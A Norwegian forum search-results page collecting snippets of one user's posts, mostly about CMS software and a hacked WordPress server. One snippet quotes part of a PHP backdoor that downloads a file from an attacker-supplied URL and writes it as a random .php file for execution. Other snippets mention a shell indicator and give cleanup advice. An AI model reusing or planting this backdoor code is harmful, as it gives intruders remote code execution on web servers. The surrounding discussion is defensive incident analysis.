Søkeresultater

... de pengene "byttes" isåfall. Har du en positiv bankkonto, så er jo firmaet tilsvarende mye mer verd enn om den skulle vært null, eller negativ..

Kan tenke meg at noen "data" er "server/host-spesifikk" og vil sannsynligvis lage kluss på en annen host dersom man tok en dum "blåkopi".

Filene er "datostemplet" 20 januar 2011 Kl 13:07 i "tar-fila". De har i det minste rørt "pakka" i år. :) Mulig de som utvikler har "glemt" at folk mister lett motet dersom det stopper opp i installasjonen. Tipper utviklere ikke har kjørt en full install fra scratch på noen år og ikke har...

fysjom.. selv Install-scriptet feilet på grunn av "gammeldags koding". Frykter da at resten av pakka er like avleggs. "Call-time pass-by-reference has been deprecated in..."

Flott regel! :) Skulle vært min-grense på 1.000 poster slik at vi med "seriøse planer" ikke fikk butikken vraket. :D

Hei fikk med meg i en tråd på Digi at "Arena CM" var open source. Noen som har testet dette? Er det verd å "bruke"? Burde vi starte en "komite/ utredelses-kommisjon / havari-kommisjon" på nye CMS? -Har kun lastet ned tjærefila, kanskje titte litt på den i helgen.. Flere som er...

Leste litt og "fulgte opp med litt Google. Skumle saker egentlig. -Får de et lite hår innenfor, så har de til slutt full "shell-tilgang" -ADVARSEL- Ikke trykk på linker i google-resultater med headertekst "AluCaR Shell" -Man kommer rett inn på et aktivt script på en server virker det som...

Vi poster og skriver samtidig Tonny.. Selvfølgelig kan det være at noen har kapret cPanel-kontoen og kommet inn den veien, men da er det litt merkelig at de har brukt "fler-trinn-metoden" som vist her, og ikke bare lastet opp alt i en smell via intern filbehandler. Altså modifisere...

-Den "virkelige" utfordringen er å finne og tette det/de hullene som ble benyttet slik at dette kunne lastes opp. Hjelper egentlig veldig lite bare å fjerne "symptomene". Oppgradere WP, og alle Plugins, evt sjekke om det er noen kjente hull i benyttede plugins, fjerne de plugins som er under...

Denne er kraftig og "pur evil". :) file_get_contents('php://input') Vi kan trygt si at den serveren er/var under full kontroll. -Ser ut som et proft "shell-script" med "sikker kommunikasjon". -ikke veldig bevandret i sånne script. Men en med "peil" vil si at serveren er PWN!

hehe.. Ja, nå er vi spente på hva "payload" er, -altså innholdet i de/den f033ab37c30201f73f142449d037029e.php-fila. Tonny! -Du har bare å dele.. -Har man først sagt A, så må man ta hele alfabetet til Å også! :) Edit:-Tonny postet mens jeg skrev.. (Hørtes nesten litt erotisk ut! :rolleyes: )

Dette er egentlig en grei jobb for din egen pc også, trenger ikke å koste all verden av ressurser i form av internettrafikk og "treg pc". -Bare et spørmål om å "automatisere". -Det moralske ved dette er ikke et tema så lenge du sanker til eget bruk, men så fort du deler med andre, så kan...

Det er "uvesentlig" egentlig hva du bytter ut, det er "bare" filnavn fra 1 .. 100 som er MD5 kodet, så "gutta" kan fort finne frem gyldig filnavn.. Men du kan finne ut hva de har stappet i den filene, innholdet av de filene er like "interessante".. :)

Ja, "hacker" henter sin fil fra hvor han vil, lagrer den med et tilfeldig navn på server.. Fikk det ikke til å funke "OK" lokalt her, kanskje den eksterne filen må "pre-prosesseres" på en spesiell måte, ble mange MD5.php-filer på root (6c8349cc7260ae62e3b1396831a8398f.php) med fillengde 0.. Så...

if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){ $ch = curl_init($_GET['file']); $fnm = md5(rand(0,100)).'.php'; $fp = fopen($fnm, "w"); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_exec($ch)...

Tvert om.. PHP er totalt uegnet til direkte "hardware-access". Du kommer nok lenger med C++, og selv der ikke langt nok ned, dersom du ikke kan gå via et API eller driver som er installert på maskinen. Mulig du kan trikse det til via passthru(), exec() eller tilsvarende.. Dvs. starte et...

Den kodesnutten der ser ut som om den kan gjøre det meste ja.. Det den ikke har innebygd av funksjonalitet kan den laste opp. (Den har mulighet til å opprette en random php-fil som er skrivbar, og selvfølgelig kjøre den) Så jeg vil uten videre si at den gjør systemet pip-åpent til alt hva...

.. tror nok du har valgt feil "språk" til å utvikle "drivere" i.. ;)

Vil anta at det å lage engen "fork" av WP kan være litt i det drøyeste laget for en mann som tenker at man vil "lære litt" mens man utvikler. -Blir lett motløs i starten da det er mye man ikke forstår "vitsen" med, og aldri har tenkt til å bruke. Men er så utrolig enig i at det å pløye...

Vet ikke hvor mye dere har fulgt med på av rykter fra de "store data-gutta". Men kom over et sjarmerende bilde som traff midt i blinken. :D Funnet originalt på: Organizational Charts | Bonkers World